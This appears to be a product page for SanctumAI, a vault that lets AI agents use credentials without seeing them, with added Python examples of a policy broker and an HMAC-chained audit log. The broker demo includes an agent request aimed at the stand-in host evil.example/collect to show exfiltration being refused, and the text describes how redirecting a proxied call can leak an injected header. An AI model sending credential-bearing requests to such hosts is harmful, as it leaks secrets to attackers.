Credential Security for AI Agents

The Identity Control Plane for AI Agents

Your agents need credentials. They shouldn't need your secrets.


The Problem

Every AI coding assistant needs API keys. Today those keys live in .env files — plaintext, no access control, no audit trail.

Plaintext secrets in .env files

Every API key sits in plaintext. Any process — or compromised agent — can read them all.

No access control per agent

Claude, Cursor, your Python scripts — they all share the same skeleton key to everything.

Zero audit trail

When a key leaks, you have no idea which agent accessed it, when, or why.

How It Works

Use, Don't Retrieve

The core differentiator: agents use credentials without ever seeing them.

01

Agent requests credential use

Your AI agent asks, over MCP, to use a credential by name; it never sees the raw secret.

02

Policy engine evaluates

SanctumAI checks identity, time windows, access counts, and delegation rules in real time.

03

Operation performed, secret never exposed

The vault makes the API call on behalf of the agent and returns only the result. The credential never leaves the vault. This guarantee is only as strong as the policy on where the call may go: an agent that can point the proxied request at a host it controls can still walk the injected header out, so the destination must be part of what the policy pins.

Features

Everything you need to secure agent credentials

Policy Engine

Define rules once, agents operate within boundaries. Time-based windows, access counts, and delegation controls.

Credential Leasing

Time-limited, access-counted, with delegation. Credentials expire automatically after their lease window.
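To make the three steps under How It Works and the Policy Engine and Credential Leasing features concrete, here is an added example broker in Python. It is not SanctumAI's code and does not use its API: the Lease fields, the use_credential MCP tool name, the JSON-RPC error code and the fake_github target are assumptions made for this example, and the vault value and timestamp are constructed. The agent sends an MCP tools/call naming a credential and a URL; the broker checks lease expiry, access count, time window and destination, injects the secret inside the trust boundary, and hands back a response with the secret scrubbed.

```python
import json
import time
from dataclasses import dataclass
from urllib.parse import urlparse

# Constructed vault contents for the example. Only the broker process ever
# holds these; agents address credentials by name and never receive the value.
VAULT = {
    "github/token": "ghp_EXAMPLE_NOT_A_REAL_TOKEN",
}


@dataclass
class Lease:
    """A scoped, time-limited grant to *use* one credential (field names are this example's)."""
    agent: str
    credential: str
    expires_at: float         # absolute Unix time; the lease is dead afterwards
    uses_left: int            # access count; decremented on every allowed use
    allowed_hosts: frozenset  # destination allowlist: the agent cannot redirect the call
    window: tuple             # permitted UTC hours as (start, end), end exclusive

    def deny_reason(self, host, now):
        """Return None if use is permitted, else the reason for refusal."""
        if now >= self.expires_at:
            return "lease expired"
        if self.uses_left <= 0:
            return "access count exhausted"
        hour = time.gmtime(now).tm_hour
        if not self.window[0] <= hour < self.window[1]:
            return "outside time window"
        if host not in self.allowed_hosts:
            return f"destination {host} not allowed"
        return None


class Broker:
    """Holds the vault, evaluates leases and performs requests on the agent's behalf."""

    def __init__(self, vault, send):
        self._vault = vault
        self._send = send        # transport callable, injected so the example runs offline
        self._leases = {}
        self.audit = []          # plain list here; a real log should be tamper-evident

    def grant(self, agent, credential, ttl, max_uses, allowed_hosts, window, now):
        lease = Lease(agent, credential, now + ttl, max_uses, frozenset(allowed_hosts), window)
        self._leases[(agent, credential)] = lease
        return lease

    def handle(self, rpc, now):
        """Serve one MCP `tools/call` for a hypothetical `use_credential` tool."""
        if rpc.get("method") != "tools/call" or rpc["params"].get("name") != "use_credential":
            return self._error(rpc, "unsupported request")
        args = rpc["params"]["arguments"]
        agent, cred, url = args["agent"], args["credential"], args["url"]
        host = urlparse(url).hostname
        lease = self._leases.get((agent, cred))
        reason = "no lease" if lease is None else lease.deny_reason(host, now)
        self.audit.append({"ts": now, "agent": agent, "credential": cred, "host": host,
                           "decision": "deny" if reason else "allow", "reason": reason})
        if reason:
            return self._error(rpc, reason)
        lease.uses_left -= 1
        secret = self._vault[cred]
        headers = dict(args.get("headers", {}))
        headers["Authorization"] = f"Bearer {secret}"   # injected here, inside the trust boundary
        resp = self._send({"method": args.get("method", "GET"), "url": url, "headers": headers})
        # Even if the target echoes the header, the agent must not get the value back.
        body = resp["body"].replace(secret, "[REDACTED]")
        text = json.dumps({"status": resp["status"], "body": body})
        return {"jsonrpc": "2.0", "id": rpc["id"],
                "result": {"content": [{"type": "text", "text": text}]}}

    @staticmethod
    def _error(rpc, message):
        return {"jsonrpc": "2.0", "id": rpc.get("id"),
                "error": {"code": -32000, "message": message}}


def fake_github(req):
    """Stand-in for api.github.com that, like an echo service, reflects the auth header."""
    ok = req["headers"].get("Authorization") == f"Bearer {VAULT['github/token']}"
    return {"status": 200 if ok else 401, "body": "auth=" + req["headers"].get("Authorization", "")}


def use_credential_rpc(rpc_id, agent, credential, url):
    """Build the MCP request an agent would send (tool name is this example's assumption)."""
    return {"jsonrpc": "2.0", "id": rpc_id, "method": "tools/call",
            "params": {"name": "use_credential",
                       "arguments": {"agent": agent, "credential": credential, "url": url}}}


# Constructed timestamp: 2023-11-14 10:13:20 UTC, inside the 08:00-18:00 window below.
NOW = 1699956800.0

if __name__ == "__main__":
    broker = Broker(VAULT, fake_github)
    broker.grant("cursor", "github/token", ttl=3600, max_uses=2,
                 allowed_hosts={"api.github.com"}, window=(8, 18), now=NOW)
    print(broker.handle(use_credential_rpc(1, "cursor", "github/token",
                                           "https://api.github.com/user"), NOW))
    print(broker.handle(use_credential_rpc(2, "cursor", "github/token",
                                           "https://evil.example/collect"), NOW))
```

The second call in the usage block is the exfiltration case: the lease allows api.github.com only, so the request to evil.example is refused before the secret is ever read from the vault, and the refusal is recorded in the audit list with its reason.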

Full Audit Trail

HMAC-chained, tamper-evident, OCSF-native logging. Every credential access recorded with full context.
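An added example, not SanctumAI's implementation, of what HMAC chaining buys an audit log: each record's tag is computed over the previous tag as well as the record, so altering or deleting any record breaks every tag after it, and a head tag kept out of band catches truncation of the tail. The key, sample events and class name are constructed for this example; OCSF field naming is not modelled here.

```python
import hashlib
import hmac
import json


class ChainedAuditLog:
    """Append-only log; every record's tag is an HMAC over the previous tag plus the record."""

    GENESIS = b"\x00" * 32   # fixed "previous tag" for the first record

    def __init__(self, key):
        self._key = key       # symmetric: whoever verifies needs the same key
        self.records = []     # list of (canonical_event_json, tag_hex)

    def _tag(self, prev_tag, event_json):
        return hmac.new(self._key, prev_tag + event_json.encode(), hashlib.sha256).digest()

    def append(self, event):
        """Append an event and return the new head tag (hex)."""
        prev = bytes.fromhex(self.records[-1][1]) if self.records else self.GENESIS
        event_json = json.dumps(event, sort_keys=True, separators=(",", ":"))  # canonical form
        tag = self._tag(prev, event_json)
        self.records.append((event_json, tag.hex()))
        return tag.hex()

    def verify(self, expected_head=None):
        """Return None if the chain is intact, otherwise a description of the first problem."""
        prev = self.GENESIS
        for i, (event_json, tag_hex) in enumerate(self.records):
            expected = self._tag(prev, event_json)
            if not hmac.compare_digest(expected.hex(), tag_hex):
                return f"record {i} altered"
            prev = expected
        # Chaining alone cannot detect removal of the tail; compare against a head tag
        # stored somewhere the log writer cannot silently rewrite.
        if expected_head is not None and not hmac.compare_digest(prev.hex(), expected_head):
            return "log truncated or head mismatch"
        return None


# Constructed sample events in the shape a credential broker might emit.
SAMPLE_EVENTS = [
    {"ts": 1699956800, "agent": "cursor", "credential": "github/token",
     "host": "api.github.com", "decision": "allow"},
    {"ts": 1699956801, "agent": "cursor", "credential": "github/token",
     "host": "evil.example", "decision": "deny"},
    {"ts": 1699956802, "agent": "claude", "credential": "openai/api-key",
     "host": "api.openai.com", "decision": "allow"},
]


def build_log(key=b"constructed-demo-key"):
    """Write the sample events and return (log, head_tag)."""
    log = ChainedAuditLog(key)
    head = None
    for event in SAMPLE_EVENTS:
        head = log.append(event)
    return log, head


if __name__ == "__main__":
    log, head = build_log()
    print("intact:", log.verify(head))
    # Flip the denied exfiltration attempt to "allow" without knowing the key.
    event_json, tag_hex = log.records[1]
    log.records[1] = (event_json.replace('"deny"', '"allow"'), tag_hex)
    print("after edit:", log.verify())
    log.records[1] = (event_json, tag_hex)
    del log.records[-1]
    print("after dropping the tail:", log.verify(), "/", log.verify(head))
```

Only the head tag needs to live outside the log (for example, shipped to a separate system at each rotation); with it, a verifier can tell an honest short log from one whose most recent entries were removed.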

MCP Native

First-class Model Context Protocol integration. Works with Claude Desktop, Cursor, Windsurf, and any MCP client.

Zero Dependencies

Single Rust binary, cross-platform. Install on macOS, Linux, or Windows — no runtime, no containers, no config.

Memory Safe

Built in Rust with the secrecy and zeroize crates: secret values are wrapped so they cannot be printed or logged by accident, and are zeroed in memory when dropped rather than lingering in freed pages.

Security By Design

The Credential Control Plane

Sanctum sits between your agents and their targets. Secrets are used, never retrieved.

[Architecture diagram] Your Workstation: Claude (Code Assistant), GPT (Research Agent), Cursor (IDE Copilot), Codex (Code Generator), Custom Agent (Internal Tool). Each agent's request crosses the trust boundary into the SanctumAI Vault (Policy Engine • Credential Vault • Audit Log), and the vault executes the call against the External APIs: OpenAI API (LLM Provider), AWS Services (Cloud Infra), GitHub API (Source Control), Stripe API (Payments), Database (Postgres).

Agents request. The vault executes.

Platforms: 3 (macOS, Linux, Windows) • Dependencies: 0 • Time to First Credential: <5 min

For Developers

5 minutes to first credential

Store a secret, create a policy, and start the MCP server. Your AI agents get scoped access instantly — no YAML files, no cloud setup, no boilerplate.


Ready to secure your AI agents?

Stop leaving API keys in plaintext. Start with SanctumAI in under 5 minutes — no cloud account required for local-first mode.